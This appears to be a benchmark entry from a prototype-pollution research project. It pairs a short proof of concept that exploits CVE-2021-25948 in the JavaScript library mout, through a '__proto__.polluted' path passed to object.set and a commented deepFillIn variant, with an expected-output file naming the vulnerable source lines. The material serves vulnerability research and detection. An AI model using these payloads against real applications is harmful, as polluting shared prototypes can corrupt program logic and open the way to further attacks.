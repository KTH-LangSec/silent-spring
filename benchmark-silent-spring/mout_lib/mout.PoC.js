//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25948
var mout = require("mout");

mout.object.set({}, "__proto__.polluted", "yes");

// var payload = JSON.parse('{"__proto__": {"polluted": "yes"}}');
// mout.object.deepFillIn({}, payload)
