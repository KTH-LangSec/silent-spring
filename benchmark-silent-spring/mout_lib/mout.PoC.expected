node_modules/mout/object/set.js:10:57
node_modules/mout/object/deepFillIn.js:19:33
